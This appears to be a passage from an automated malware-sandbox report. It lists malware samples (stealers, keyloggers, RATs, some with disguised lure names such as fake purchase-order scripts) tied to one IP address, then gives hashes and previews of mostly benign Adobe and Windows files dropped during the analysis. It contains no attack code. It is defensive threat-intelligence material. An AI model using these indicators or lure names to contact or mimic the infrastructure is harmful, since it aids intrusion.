                                          re5.mp4.htaGet hashmaliciousLummaCBrowse
                                          • 92.113.18.193
                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 92.113.18.193
                                          Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                          • 92.113.18.193
                                          Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                          • 92.113.18.193
                                          Epsilon.exeGet hashmaliciousUnknownBrowse
                                          • 92.113.18.193
                                          XClient.exeGet hashmaliciousXWormBrowse
                                          • 92.113.18.193
                                          hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                          • 92.113.18.193
                                          37f463bf4616ecd445d4a1937da06e196684V5n83w.exeGet hashmaliciousVidarBrowse
                                          • 92.113.18.193
                                          heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 92.113.18.193
                                          zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                          • 92.113.18.193
                                          hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                          • 92.113.18.193
                                          Loader.exeGet hashmaliciousMeduza StealerBrowse
                                          • 92.113.18.193
                                          setup.msiGet hashmaliciousUnknownBrowse
                                          • 92.113.18.193
                                          BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                          • 92.113.18.193
                                          Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                          • 92.113.18.193
                                          Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                          • 92.113.18.193
                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                          • 92.113.18.193

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.726333835586031
                                          Encrypted:false
                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0W:9JZj5MiKNnNhoxuf
                                          MD5:ADE5ACFA865375BA1C5E5F07535DE762
                                          SHA1:B57F978501E473403A0F95130074729C84DCF743
                                          SHA-256:2DE69FF7E8A3530DA5B86B8CD63684D4B38082CBA5D739511904B6A83AEE3B3B
                                          SHA-512:B5DBA001D97569B27394A97F144B9F442CE7C9E61A3F477F7208943DD969BDAB69D53383EB0DF91C7B3EFFE1DC8E05A5A84C55C035FCC15840642489FC90D1B6
                                          Malicious:false
                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x8c173f22, page size 16384, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.7556031420567035
                                          Encrypted:false
                                          SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                                          MD5:47EF57947E59E90B5D53C8F3315B1A50
                                          SHA1:63F80EB780483A71D4C59D557ED6BE3F451ADF81
                                          SHA-256:D346181562400CB92ACBE8908E24CCF86D5E336874262D2462B5F5FFF4D7946A
                                          SHA-512:ACBC5FD07CBE37DB6D6577B09ED52F31DA43F6E7C6B14562DCC26D5FF9D8B9DED75886E833B5B8049AC558F124393F0512A517443317D3DCE8100C35AE399EA4
                                          Malicious:false
                                          Preview:..?"... .......7.......X\...;...{......................0.e......!...{?..&...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................H.\..&...|..................<.U.&...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):0.08017734003193144
                                          Encrypted:false
                                          SSDEEP:3:rlXKYeQRZc3NaAPaU1lgpSAlluxmO+l/SNxOf:xXKzmZENDPaUTAgmOH
                                          MD5:17611623C5952F51F5EBC4926AB5075E
                                          SHA1:A14118A0C3012AAE9EAB5C7989A769F8AE111E7C
                                          SHA-256:5DF074128271F19806703FA2FDC961F577E645A25EF99B72EA304A72108A24B1
                                          SHA-512:64086A0CAA36EDFBC12D085C12F4C70746D6C33931998CF98004AD9B9AF8D8494AC7D9A423FE020E5149958FF3EBA2179ACAED22C74A1E8483878C0EEC4C31D0
                                          Malicious:false
                                          Preview:..s.....................................;...{...&...|...!...{?..........!...{?..!...{?..g...!...{?..................<.U.&...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):298
                                          Entropy (8bit):5.179743957385337
                                          Encrypted:false
                                          SSDEEP:6:5SJLjyq2PN72nKuAl9OmbnIFUt8MSJug11Zmw+MSJugjRkwON72nKuAl9OmbjLJ:6yvVaHAahFUt8cgX/+cgjR5OaHAaSJ
                                          MD5:8B3BEBBD8BB3BDBB2F7ADCE71D73A2DA
                                          SHA1:634FF058A7590F121FD2ED8670D8D98A60B961A8
                                          SHA-256:CB38B74C52CC7A2DA44D56BD910FEE9562E2F53B500C38E76139528D05BB798A
                                          SHA-512:6D66E5E7B0FFACDB69D2B76FDA007BFAB32840A9BC6CD1F9DC39AEA38015A19DD53F15040F671C53E9CFB428FD6256BE424F310033CFE2028264EB4D302C69A8
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.199 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/31-04:38:08.201 1c74 Recovering log #3.2024/12/31-04:38:08.201 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):298
                                          Entropy (8bit):5.179743957385337
                                          Encrypted:false
                                          SSDEEP:6:5SJLjyq2PN72nKuAl9OmbnIFUt8MSJug11Zmw+MSJugjRkwON72nKuAl9OmbjLJ:6yvVaHAahFUt8cgX/+cgjR5OaHAaSJ
                                          MD5:8B3BEBBD8BB3BDBB2F7ADCE71D73A2DA
                                          SHA1:634FF058A7590F121FD2ED8670D8D98A60B961A8
                                          SHA-256:CB38B74C52CC7A2DA44D56BD910FEE9562E2F53B500C38E76139528D05BB798A
                                          SHA-512:6D66E5E7B0FFACDB69D2B76FDA007BFAB32840A9BC6CD1F9DC39AEA38015A19DD53F15040F671C53E9CFB428FD6256BE424F310033CFE2028264EB4D302C69A8
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.199 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/31-04:38:08.201 1c74 Recovering log #3.2024/12/31-04:38:08.201 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):342
                                          Entropy (8bit):5.175193705050396
                                          Encrypted:false
                                          SSDEEP:6:5SJB39+q2PN72nKuAl9Ombzo2jMGIFUt8MSJPEJZmw+MSJuGN9VkwON72nKuAl97:uN+vVaHAa8uFUt8Rm/+IG3V5OaHAa8RJ
                                          MD5:4DD8F1B899F67CD0657DA121BF4D10E7
                                          SHA1:3972256535A136C53ED70864F61C8A010C131686
                                          SHA-256:92B33CF57A3B67B663822D717ED56BEBA083A0FB1BD9263A57D2AFC0A28707B1
                                          SHA-512:76AB89FE44633B7D73A6BB65E314F705C4C0E72188537C17AACF48C6D674303734DCEF44C190F35741294616705FE9D8A1B2A80481B5A6E1BFB7569F61DDE5EC
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.257 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/31-04:38:08.258 1d2c Recovering log #3.2024/12/31-04:38:08.259 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):342
                                          Entropy (8bit):5.175193705050396
                                          Encrypted:false
                                          SSDEEP:6:5SJB39+q2PN72nKuAl9Ombzo2jMGIFUt8MSJPEJZmw+MSJuGN9VkwON72nKuAl97:uN+vVaHAa8uFUt8Rm/+IG3V5OaHAa8RJ
                                          MD5:4DD8F1B899F67CD0657DA121BF4D10E7
                                          SHA1:3972256535A136C53ED70864F61C8A010C131686
                                          SHA-256:92B33CF57A3B67B663822D717ED56BEBA083A0FB1BD9263A57D2AFC0A28707B1
                                          SHA-512:76AB89FE44633B7D73A6BB65E314F705C4C0E72188537C17AACF48C6D674303734DCEF44C190F35741294616705FE9D8A1B2A80481B5A6E1BFB7569F61DDE5EC
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.257 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/31-04:38:08.258 1d2c Recovering log #3.2024/12/31-04:38:08.259 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\295c51ac-a3b4-43e1-9c1d-c7c387a33b33.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:modified
                                          Size (bytes):475
                                          Entropy (8bit):4.975824910517686
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq2SAxSmksBdOg2H0fcaq3QYiubcP7E4TX:Y2sRdspJxSmJdMHz3QYhbA7n7
                                          MD5:DF2F4AD335F6A08B95B1CC693B887E10
                                          SHA1:11C6AA9BF8FF2A5CE8FF8231A18AD033066706BB
                                          SHA-256:131ACA19463CC68BEC80E843C9AB4041D41F6EB35362D1E93CAC0A3FA2D228E8
                                          SHA-512:83FF6E2A02E8B6459031365355753DC52CC3E22F10D1740A98F51B0525772FAEFA82F82EC4914346CAE86BAAB4D95AC6B899D654887A5400483965DA6151A55E
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380197899957473","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":116620},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):475
                                          Entropy (8bit):4.971824627296864
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                          MD5:F326539D084B03D88254A74D6018F692
                                          SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                          SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                          SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF528de9.TMP (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):475
                                          Entropy (8bit):4.971824627296864
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                          MD5:F326539D084B03D88254A74D6018F692
                                          SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                          SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                          SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\fe472dc3-ac1c-43fb-b12a-92a564baa518.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):475
                                          Entropy (8bit):4.971824627296864
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                          MD5:F326539D084B03D88254A74D6018F692
                                          SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                          SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                          SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):5449
                                          Entropy (8bit):5.248255747688015
                                          Encrypted:false
                                          SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7f8CNF:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhr
                                          MD5:DE35E3110FB8CB72550E6D99F260ACFE
                                          SHA1:8857CEA912A1E34A2BC9DE5C9D1531B88ECCE4ED
                                          SHA-256:09925E300767FE8D534D229639C023DC064AE36CDE0ED27E22658107221B7600
                                          SHA-512:4D9BFF2126D1F37C31E6DFBAD6AF3E55DAEA852C042DCBD74412F411D9636935C8AD6611AEBD0BEE78202A2462E32FBBFBBB8E8EB26EF8FFFD05221CE12ED00B
                                          Malicious:false
                                          Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):330
                                          Entropy (8bit):5.158839447905453
                                          Encrypted:false
                                          SSDEEP:6:5SJat9+q2PN72nKuAl9OmbzNMxIFUt8MSJa0iJZmw+MSJag9VkwON72nKuAl9Omk:fX+vVaHAa8jFUt8E08/+E+V5OaHAa84J
                                          MD5:B84ED15AEF3DCE530DA71531CF701556
                                          SHA1:416FA5FE5CBC71CFC2716809FC4E94E1BFCF9BD4
                                          SHA-256:45776E1A32148240102AE81EAE3E945CC1DA6F61EFCE2EC2384C1F636C663DA7
                                          SHA-512:32ACCD0B6BB67FB96437114E72F535D36D05CB8C88E641129E435C21F5FB9C540C7DC96A7F88FE111FADA18E33C8EFD45394465877ABB4C055E1DAAE96D3B8F9
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.386 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/31-04:38:08.388 1d2c Recovering log #3.2024/12/31-04:38:08.389 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):330
                                          Entropy (8bit):5.158839447905453
                                          Encrypted:false
                                          SSDEEP:6:5SJat9+q2PN72nKuAl9OmbzNMxIFUt8MSJa0iJZmw+MSJag9VkwON72nKuAl9Omk:fX+vVaHAa8jFUt8E08/+E+V5OaHAa84J
                                          MD5:B84ED15AEF3DCE530DA71531CF701556
                                          SHA1:416FA5FE5CBC71CFC2716809FC4E94E1BFCF9BD4
                                          SHA-256:45776E1A32148240102AE81EAE3E945CC1DA6F61EFCE2EC2384C1F636C663DA7
                                          SHA-512:32ACCD0B6BB67FB96437114E72F535D36D05CB8C88E641129E435C21F5FB9C540C7DC96A7F88FE111FADA18E33C8EFD45394465877ABB4C055E1DAAE96D3B8F9
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.386 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/31-04:38:08.388 1d2c Recovering log #3.2024/12/31-04:38:08.389 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241231093813Z-201.bmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                          Category:dropped
                                          Size (bytes):65110
                                          Entropy (8bit):2.9110196685429117
                                          Encrypted:false
                                          SSDEEP:192:skW8b9hgpYcEHRHbYjA091vHLvc5LHyVov:skW8b9hgpYcEHRHbsl91vHLvc5LHyVov
                                          MD5:F8B2DC7C8853459FB20B7656F92788CF
                                          SHA1:298E41FB7D297CD5AE698AD64762DEA3EC38CB45
                                          SHA-256:0F9709C4DD79A575EB74706A645B07E9DDE958673FE6032BF42DAA0DAA1FD136
                                          SHA-512:6D4CFF6225243FE1D3BAA993AC095438D212AA42CC59223B21786A1CD6F066F2490945040538365E4FE111EAB779B4C1A915BC6D28910D68A8E0D65F6A3CC2CB
                                          Malicious:false
                                          Preview:BMV.......6...(...k...h..... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):86016
                                          Entropy (8bit):4.444894941217673
                                          Encrypted:false
                                          SSDEEP:384:ye6ci5t1iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mes3OazzU89UTTgUL
                                          MD5:A05C701154D24B7322408B9BEF6C065D
                                          SHA1:1F5B607E8963E1221692D922565218BB8B230695
                                          SHA-256:AEDB53F390F1992EF128587FC6145395180F8D45A8FAC541586F2000FFE9471F
                                          SHA-512:CD9C1CCEF78DC21FEA22A30CB51D91A2EC523B6593FD1D35C420789B68439063162A7E0A046A0EAA05653204D10D20661C6A2F7D09B4E31125BF33F043B5F8B5
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite Rollback Journal
                                          Category:dropped
                                          Size (bytes):8720
                                          Entropy (8bit):3.764917447129481
                                          Encrypted:false
                                          SSDEEP:48:7Mk7JioyVvioyfoy1C7oy16oy1pKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1U:7p7JuvNwXjBi4b9IVXEBodRBkN
                                          MD5:CE5E80DA7633EE3CF6C6D6AE935ADD08
                                          SHA1:620C49DC44CFFDD0AA9B1CD42521408E6366F058
                                          SHA-256:9580D95F7291911D0A1CE4D4AD52AAA8F89055750235D7E1F6499C87884356B4
                                          SHA-512:5FB8713E0A5B52477BD7236716F96A116938C91E53423600F477F6F06905EA6A0DC49645DCA549E199947C1CC25F5D47A2B360FE2855F1D8A5F621651E51DD31
                                          Malicious:false
                                          Preview:.... .c.....m.S................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:Certificate, Version=3
                                          Category:dropped
                                          Size (bytes):1391
                                          Entropy (8bit):7.705940075877404
                                          Encrypted:false
                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                          Malicious:false
                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                          Category:dropped
                                          Size (bytes):71954
                                          Entropy (8bit):7.996617769952133
                                          Encrypted:true
                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                          Malicious:false
